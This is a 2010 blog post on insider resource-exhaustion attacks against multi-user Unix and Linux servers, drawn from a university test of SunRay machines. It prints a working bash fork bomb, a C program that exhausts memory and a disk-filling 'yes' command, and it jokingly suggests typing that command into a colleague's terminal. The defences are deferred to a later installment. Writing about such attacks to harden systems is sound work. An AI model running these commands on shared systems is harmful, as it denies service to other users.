Multi-user Linux security - insider resource attacks

Published: Thursday, 27 May 2010 16:25

It is commonly assumed that the largest threats to computer systems come from "the outside" and can be prevented by decent anti-virus and firewalls.  Attacks from the inside (usually legitimate users, or compromised accounts) are often overlooked, which could be devastating in large multi-user environments.  The resource issues outlined in this article may be exploited both deliberately or through bugy software, but prevention can be simple.

When asked why someone prefers a non-Windows operating system over Microsoft Windows, the standard response from "home users" will always include "security".  While this may be true, it is far from the end of the story.  To highlight this, I was recently one of many people invited to help test a room full of SunRay machines at Aberystwyth University.  The idea of the exercise was to make known any issues with the setup in order to prevent them, rather than leave the network to chance.  We managed to bring the entire room to a halt on several occasions, which was a nice achievement but surely the beast that is Solaris 10 should have kept a bunch of students out for more than a few minutes?  The problem stems from the fact that all logged in users are logged in and running programs on the same physical machine.  All of the problems we found were extremely basic to attack, and had the common theme of resource wastage.  Multi-user operating systems must therefore be configured to strike a balance between giving freedom for users to do what they need to do, and stopping this freedom restricting the resources of other users.

Listed below are some of the problems we found, which are very common issues and how I have dealt with them on my own CentOS and FreeBSD multi-user servers using "ulimit"

Fork Bomb

I was a bit disappointed that this one worked as well as it did.  In a university environment I'd expect anyone using forks in a C program for example to cause infinite forks at least once per term!  I was even more disappointed that the person who did it heard me talking about how to do it in the first place, but that"s a rant for another day.  A fork bomb is essentially a program that "forks" itself repeatedly. This basically means it clones itself and runs as another process.  The program in question was a single line of shell code:

  1. :(){ : | : & }; :

Although this looks like a bunch of smilies, it is the easiest and quickest way to crash a Unix or Linux based machine.  The following code segment is exactly the same as above, but written in a more traditional way.  If you are familiar with shell scripts, the effects should be fairly easy to work out.

  1. func() {
  2. func | func &
  3. };
  4. func

This defines the function func() which then calls the function func() and pipes the output to func() which is forked as a new process so that it now runs independantly of the parent.  These new forked processes then fork more processes and so on and so on.......  Fork bombs can bring even a relatively powerful server to a standstill in seconds rather than minutes, and does so by taking all of the space in the operating systems process table, as well as using a lot of processing time whilst processes are forked.  This makes curing the problem once it has started extremely difficult, one suggestion is to run a second fork bomb that you have control over to take back processes one-by-one until the fork bomb has been eradicated, then send the command to kill the second wave of fork bombs.  Unfortunately, by the time an attack has been spotted and identified, it is unlikely that there will be enough process space to start the counter attack.  The best thing to do is prevent it occurring in the first place by setting process limits.

Memory Wastage

It was not confirmed whether this was actually the cause of a user-wide system halt on the universities Sun machines, however I was able to reliably replicate the issue 3 out of 3 times, and the "top" output before it crashed certainly suggested it was something to do with me, so I"m counting it as a second win.  I was quite pleased I got this one to work, although not surprised after the affects of the fork bomb.  If processes were not limited, then memory usage was unlikely to be either.  The difference is that accidental memory leaks are more common than fork bombs, but usually only waste a few MB.  By hogging all of the systems RAM, processes that request chunks of memory will not be allocated any.  It will then depend upon how each piece of running software is designed to deal with the problem (e.g. malloc returning null) as to how the problem ends.  Many programmers ignore the null return causing programs to "crash" (e.g. core dump).  Others may exit gracefully, write to error logs, halt until memory becomes available or attempt to continue normal operations.  Aditionally, data integrity and system security may be comprimised.  I wrote some simple C code to test this, an example of which is listed below.

  1. int main()
  2. {
  3. int i = 0;
  4. while(1)
  5. {
  6. char *t = (char*)malloc(1024*1024);
  7. if(t == NULL)
  8. {
  9. printf("end");
  10. }else{
  11. printf("%d MB", i);
  12. i++;
  13. }
  14. }
  15. return 0;
  16. }

Hogging File Descriptors

As with processes discussed earlier, there are only so many files that can be opened, and again the maximum is defined by the kernel.  Modifying the code above to open files will allow you to test this, however the principle is exactly the same as with processes.  If you allocate them all at the same time, nobody else will be able to open a file until more descriptors become available.  Unlike the process issue however, applications requiring file handles are already running - leading to the same result as not getting a valid memory address when memory is scarce.  It will all depend on the error handling of individual applications.

Filling the Disks

Running out of disk space on a machine for a normal home user can be a pain, but a single well-placed large file on a multi-user server can bring things to a standstill.  Commands such as "dd" make file generation trivial, however it is often the sneaky ones that go unnoticed.  Typing something like :

  1. yes > ~/large_file &

into a coleagues terminal will give you plenty of time to escape before they realise the disk quota has been reached.

Next Time...

In the next installment of this article I will discuss how to prevent the above attacks.